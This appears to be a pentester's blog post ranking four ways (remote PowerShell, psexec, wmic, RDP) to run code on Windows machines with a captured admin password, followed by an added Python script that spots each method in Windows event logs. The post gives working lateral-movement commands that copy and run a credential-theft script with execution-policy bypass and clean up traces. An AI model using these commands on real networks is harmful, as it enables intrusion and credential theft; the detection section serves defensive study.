Code Execution (Post Exploit) Order of Operations
November 1, 2013
[quick post this month, probably lower quality than usual because I’m traveling in China and writing this on a bus]
With a cleartext Windows admin password in hand, there are of course multiple ways to execute code. How do other pentesters do this? If you do it differently than I do, what’s your motivation? This isn’t rhetorical – I hope both of you who read this blog let me know :)
In general, I try not to stay too rigid. In my opinion, it’s best to mimic how real operations folks operate. That said, I do have an order of preferred ways to execute remote code. Any of these could potentially be audited as a “we’re pwned” event for a blue team, but some are inherently noisier than others.
1. Remote powershell
This seems to be the stealthiest method. First, if remote PowerShell is enabled, people are probably using it, so you using it may not stand out. Further, if you code without using .NET fragments, nothing is written to disk at all – it’s all in memory (the caveat is that if you compile C# from your PowerShell, it will write artifacts to disk). If port 5985/5986 is open, this is a good bet.
# script block to run on the remote host
$comm = { Invoke-Portscan -Hosts 192.168.1.1/24 -SkipDiscovery -noProgressMeter -Ports 443 }
# build a credential object from the cleartext password
$secpasswd = ConvertTo-SecureString "Password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("DOMAIN\muser", $secpasswd)
# execute the script block over WinRM
Invoke-Command -ComputerName mcomputer -Credential $mycreds -ScriptBlock $comm
2. powershell over psexec
This starts a service as SYSTEM (usually), which can be noisy. Additionally, you often want to execute your own thing, which will require you to upload it to the box you’re attacking. That said, psexec is also a common real administration method; I often find psexec already installed on many utility boxes. If port 445 is open, this is usually the method I try next – uploading a PowerShell script to the server and then executing it with psexec.
# powershell over psexec
# psexec has the -c option for copying executables, but it doesn't work as well with
# scripts like this (because powershell.exe is the executable)
$servername = "192.168.137.100"
$username = "192.168.137.100\Administrator"
$password = "password"
$LocalOutFile = "out.txt"
$LocalPS = "mim.ps1"
$psFile = "10982124.ps1"
# map the remote Temp directory and copy the script over
net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null
copy $LocalPS q:\$psFile
# run the script with psexec; the piped echo gives psexec a stdin so it doesn't hang when run non-interactively
& cmd /c echo "." | psexec.exe /accepteula -u $username -p $password \\$servername powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> $LocalOutFile 2>&1
# cleanup
del q:\$psFile
net use q: /delete | Out-Null
3. powershell over wmic
Even if you’re an admin on the box and you can reach port 445, psexec can be effectively disabled, for example if the ADMIN$ share is not available (you can see this as an access denied when ADMIN$ is requested in a packet capture, and you can also see it in the registry at HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy). Anyway, if psexec and remote PowerShell both aren’t options, wmic has always come through for me.
$servername = "192.168.137.100"
$username = "192.168.137.100\Administrator"
$password = "password"
$LocalOutFile = "out.txt"
$LocalPS = "mim.ps1"
$psFile = "10982124.ps1"
$outFile = "99120997.nss"
# copy .ps1 to the remote server
net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null
copy $LocalPS q:\$psFile
# redirect output to a file on the remote server
wmic /user:$username /password:$password /node:$servername PROCESS call create "powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> c:\Windows\Temp\$outFile"
# wait for execution to finish
sleep 30
# copy output back and cleanup
del q:\$psFile
copy q:\$outFile $LocalOutFile
del q:\$outFile
net use q: /delete | Out-Null
4. RDP
I’ve never HAD to use RDP, and it’s super noisy, but some things are easier with a desktop. I usually try to avoid this if I can, but especially if remote PowerShell isn’t enabled and 3389 is open, I’ll sometimes just go straight for RDP.
In addition to the four methods I mention above (remote PowerShell, psexec, wmic, and RDP) there are a few other ways, at least including AT, dropping files in specific places, etc. But I can almost always get the code execution I want with the above.
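The post ranks these four channels by how noisy they are for a blue team. As an added example (not from the original post), the script below shows what each channel leaves in Windows telemetry and tags process-creation (4688), service-install (7045) and logon (4624) records accordingly: remote PowerShell sessions are hosted by wsmprovhost.exe, psexec installs a PSEXESVC service and parents its child processes from PSEXESVC.exe, WMI process creation is parented by WmiPrvSE.exe, and RDP shows up as logon type 10. The sample records are constructed, and the field names (ParentImage, Image, CommandLine, ServiceName, ImagePath, LogonType) are assumptions for this example rather than any vendor's schema.

```python
"""Tag Windows event records with the remote code-execution channel they indicate.

Added example, not part of the original post. Records are constructed and
simplified; the field names are assumptions for this example.
"""
import ntpath
from typing import Dict, List, Optional, Tuple

# Process hosts that appear as the parent of remotely spawned processes.
# wsmprovhost.exe hosts WinRM / remote PowerShell sessions, PSEXESVC.exe is
# PsExec's default service binary, WmiPrvSE.exe executes WMI provider calls
# such as Win32_Process.Create (what "wmic process call create" uses).
PARENT_TO_METHOD: Dict[str, str] = {
    "wsmprovhost.exe": "remote powershell (WinRM, 5985/5986)",
    "psexesvc.exe": "psexec (SMB 445, service installed)",
    "wmiprvse.exe": "wmic process call create (WMI/DCOM)",
}

# Command-line tokens worth surfacing whatever the execution channel was.
SUSPICIOUS_TOKENS = ("-executionpolicy bypass", "-encodedcommand")


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def classify(event_id: int, fields: Dict[str, str]) -> Optional[str]:
    """Return the remote execution channel an event points to, or None."""
    if event_id == 4688:  # process creation: look at the parent image
        return PARENT_TO_METHOD.get(basename(fields.get("ParentImage", "")))
    if event_id == 7045:  # a service was installed
        if (basename(fields.get("ImagePath", "")) == "psexesvc.exe"
                or fields.get("ServiceName", "").upper() == "PSEXESVC"):
            return "psexec (SMB 445, service installed)"
        return None
    if event_id == 4624 and str(fields.get("LogonType")) == "10":  # RemoteInteractive
        return "RDP (interactive remote logon, 3389)"
    return None


def flag_command_line(fields: Dict[str, str]) -> List[str]:
    """Tokens from SUSPICIOUS_TOKENS present in the event's command line."""
    cmd = fields.get("CommandLine", "").lower()
    return [t for t in SUSPICIOUS_TOKENS if t in cmd]


def triage(events: List[Tuple[int, Dict[str, str]]]) -> List[Tuple[int, str, List[str]]]:
    """Keep only events that map to a channel; attach any command-line flags."""
    hits = []
    for event_id, fields in events:
        method = classify(event_id, fields)
        if method:
            hits.append((event_id, method, flag_command_line(fields)))
    return hits


# Constructed sample records (not real telemetry); the last one is benign.
SAMPLE_EVENTS: List[Tuple[int, Dict[str, str]]] = [
    (4688, {"ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
            "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "CommandLine": "powershell.exe -Version 5.1 -s -NoLogo -NoProfile"}),
    (7045, {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}),
    (4688, {"ParentImage": r"C:\Windows\PSEXESVC.exe",
            "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "CommandLine": r"powershell -executionpolicy bypass c:\Windows\Temp\10982124.ps1"}),
    (4688, {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
            "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "CommandLine": r"powershell -executionpolicy bypass c:\Windows\Temp\10982124.ps1"}),
    (4624, {"LogonType": "10", "TargetUserName": "Administrator"}),
    (4688, {"ParentImage": r"C:\Windows\explorer.exe",
            "Image": r"C:\Windows\System32\notepad.exe",
            "CommandLine": "notepad.exe"}),
]

if __name__ == "__main__":
    for event_id, method, flags in triage(SAMPLE_EVENTS):
        print(event_id, method, flags)
```

Note that the in-memory remote PowerShell case still leaves a 4688 record parented by wsmprovhost.exe (and script block logging, if enabled), so "nothing written to disk" does not mean nothing logged; psexec is the only one of the four that additionally produces a 7045 service-install event, which is why the post calls it noisier.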